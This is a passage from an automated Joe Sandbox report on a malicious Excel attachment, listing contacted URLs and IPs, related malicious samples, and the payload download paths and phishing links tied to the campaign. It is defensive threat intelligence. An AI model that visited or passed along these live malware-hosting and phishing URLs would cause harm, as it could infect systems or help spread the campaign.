                                                    https://store.office.cn/addinstemplate4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                              high
                                                              https://graph.windows.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v24C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                162.241.80.6
                                                                                                                                                unknownUnited States
                                                                                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                138.36.237.100
                                                                                                                                                unknownArgentina
                                                                                                                                                27823DattateccomARfalse
                                                                                                                                                91.199.212.52
                                                                                                                                                unknownUnited Kingdom
                                                                                                                                                48447SECTIGOGBfalse
                                                                                                                                                72.52.227.180
                                                                                                                                                unknownUnited States
                                                                                                                                                32244LIQUIDWEBUSfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                Analysis ID:356654
                                                                                                                                                Start date:23.02.2021
                                                                                                                                                Start time:14:25:00
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 10s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:Complaint-447781983-02182021.xls
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:22
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.expl.evad.winXLS@11/9@4/4
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 23.211.6.115, 52.147.198.201, 104.42.151.234, 52.109.88.177, 52.109.8.25, 104.43.139.144, 52.109.8.24, 52.255.188.83, 51.11.168.160, 104.43.193.48, 205.185.216.10, 205.185.216.42, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                162.241.80.6Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
                                                                                                                                                138.36.237.100Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                                                                                                                                                CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                                                                                                                                                CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                                                                                                                                                fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                                                                                                                                                • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                                                                                                                                                fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                                                                                                                                                • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                                                                                                                                                91.199.212.52CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                sys.dllGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                ReportCorp.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                1S0a576pAR.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                NJx63jHebE.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                EmployeeComplaintReport.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                ct.dllGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                rib.exeGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                https://blog.premiershop.com.br/check/m.phpGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
                                                                                                                                                https://sixtiescity.net/Get hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSAOrganizationValidationSecureServerCA.crt
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
                                                                                                                                                http://zmisrgramkgzgcwzmisrgramkgzgcwzmisrgramkgzgcw.pacificcaqital.com/bGFtQHNwYXJub3JkLmRrGet hashmaliciousBrowse
                                                                                                                                                • zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
                                                                                                                                                http://zaimwlqldrvcd.sweetwaterssecurities.com/dGVzdEB0ZXN0LmNvbQ==Get hashmaliciousBrowse
                                                                                                                                                • zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
                                                                                                                                                http://zvzuholzrkbla.leedsvvest.com/Y2hhcmxlcy55ZWVAbGl2aWJhbmsuY29tGet hashmaliciousBrowse
                                                                                                                                                • zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
                                                                                                                                                https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                                                                                                • crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                crt.sectigo.comComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                sys.dllGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ReportCorp.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                1S0a576pAR.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                NJx63jHebE.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                EmployeeComplaintReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ct.dllGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                documents.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                PSX7103491.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                rib.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                rzminc.comSecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 72.52.227.180
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 72.52.227.180
                                                                                                                                                jugueterialatorre.com.arComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                pathinanchilearthmovers.comComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.80.6
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.80.6
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.80.6

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                DattateccomARComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                swift copy pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 200.58.111.74
                                                                                                                                                Purchase Order _pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 200.58.111.74
                                                                                                                                                Purchase Order _pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 200.58.111.74
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                Payment Advice.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 66.97.33.176
                                                                                                                                                Meezan Bank Payment.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 179.43.117.150
                                                                                                                                                Walmart Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 179.43.117.150
                                                                                                                                                INQUIRY-NOV-ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                                • 179.43.114.162
                                                                                                                                                https://bit.ly/38rE21V?/rt/stone/Get hashmaliciousBrowse
                                                                                                                                                • 200.58.98.166
                                                                                                                                                PQ-237.xlsGet hashmaliciousBrowse
                                                                                                                                                • 66.97.33.213
                                                                                                                                                PQ-237.xlsGet hashmaliciousBrowse
                                                                                                                                                • 66.97.33.213
                                                                                                                                                PQ-171.xlsGet hashmaliciousBrowse
                                                                                                                                                • 66.97.33.213
                                                                                                                                                SECTIGOGBCorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                sys.dllGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CorpReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ReportCorp.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                1S0a576pAR.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                NJx63jHebE.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                EmployeeComplaintReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ct.dllGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                rib.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://blog.premiershop.com.br/check/m.phpGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://sixtiescity.net/Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zmisrgramkgzgcwzmisrgramkgzgcwzmisrgramkgzgcw.pacificcaqital.com/bGFtQHNwYXJub3JkLmRrGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zaimwlqldrvcd.sweetwaterssecurities.com/dGVzdEB0ZXN0LmNvbQ==Get hashmaliciousBrowse
